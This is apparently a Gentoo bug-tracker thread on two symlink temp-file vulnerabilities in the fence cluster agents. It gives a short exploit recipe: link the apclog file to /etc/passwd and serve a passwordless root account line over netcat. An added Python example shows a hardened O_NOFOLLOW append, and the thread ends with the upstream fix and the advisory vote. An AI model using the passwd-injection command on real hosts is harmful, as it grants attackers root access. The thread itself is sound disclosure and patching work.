/usr/sbin/fence_apc logs to /tmp/apclog if you use verbose mode:

./fence_apc -v -l foo -p bar -n 1 -a 192.168.0.1

It will write into that file. If you
a) link to /etc/passwd
b) redirect the connection (e.g. arp-spoof, dns-spoof)
you can do this on the host you redirected to:

echo "hacked::0:0:root:/root:/bin/bash" | nc -l -p 23

And the account will be appended in /etc/passwd. Honestly I doubt that will ever happen in reality, but it's possible.

http://git.fedorahosted.org/git/cluster.git?p=cluster.git;a=blob_plain;f=fence/agents/apc/fence_apc.py;hb=HEAD seems to be a completely updated version.
http://www.openwall.com/lists/oss-security/2008/10/13/3

Seems there is also a hole in fence_manual / fence_ack_manual fifo handling, it's a different bug, but I guess we can fix both in this bug #.
CVE-2008-4579 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4579):
The (1) fence_apc and (2) fence_apc_snmp programs, as used in (a) fence 2.02.00-r1 and possibly (b) cman, when running in verbose mode, allows local users to append to arbitrary files via a symlink attack on the apclog temporary file.

CVE-2008-4580 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4580):
fence_manual in fence allows local users to modify arbitrary files via a symlink attack on the fence_manual.fifo temporary file.
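The append-through-symlink problem in the CVE-2008-4579 entry above, shown next to a hardened open, as an added example that is not part of the original comments or of the fence code. The function names and the temp-directory scenario are constructed for illustration; the hardened variant assumes a POSIX system with O_NOFOLLOW.

```python
import os
import stat
import tempfile


def naive_append(path, data):
    # Pattern behind CVE-2008-4579: open a fixed, predictable path in append
    # mode. open() follows symlinks, so the write lands on the link target.
    with open(path, "a") as fh:
        fh.write(data)


def safe_append(path, data):
    # O_NOFOLLOW: fail (ELOOP) if the final path component is a symlink.
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    try:
        st = os.fstat(fd)
        # Check the object actually opened: a regular file owned by us
        # with a single name (no pre-planted hard link to another file).
        if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid() or st.st_nlink != 1:
            raise PermissionError("refusing to log to %s" % path)
        os.write(fd, data.encode())
    finally:
        os.close(fd)


def demo():
    # Constructed scenario inside a private temp directory: "target" stands in
    # for a sensitive file and "apclog" for the predictable log path.
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "target")
        log = os.path.join(d, "apclog")
        with open(target, "w") as fh:
            fh.write("original\n")
        os.symlink(target, log)

        naive_append(log, "debug line\n")
        with open(target) as fh:
            after_naive = fh.read()
        try:
            safe_append(log, "debug line\n")
            refused = False
        except OSError:
            refused = True
        with open(target) as fh:
            after_safe = fh.read()
        return after_naive, refused, after_safe
```

Keeping debug logs out of world-writable directories such as /tmp removes the race entirely; the flag and fstat checks are the fallback when the path cannot be moved.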
ha-cluster: *ping*
ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm whether this issue is fixed in your newer ebuilds?
(In reply to comment #4)
> ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm
> whether this issue is fixed in your newer ebuilds?
> Thanks!

I found this at the Debian bugtracker:

* New upstream release version 2.03.09.
  - Upstream code audit fixes several tmpfile race conditions, among them CVE-2008-4579 and CVE-2008-4580. (Closes: #496410)

We have that version in the tree, stabled, old versions are removed. So, GLSA voting time!
Ready to vote, I vote YES. What about you, a3li? ;)
YES, filed
There is no sys-cluster/fence in portage any more.
GLSA 201009-09, thanks everyone.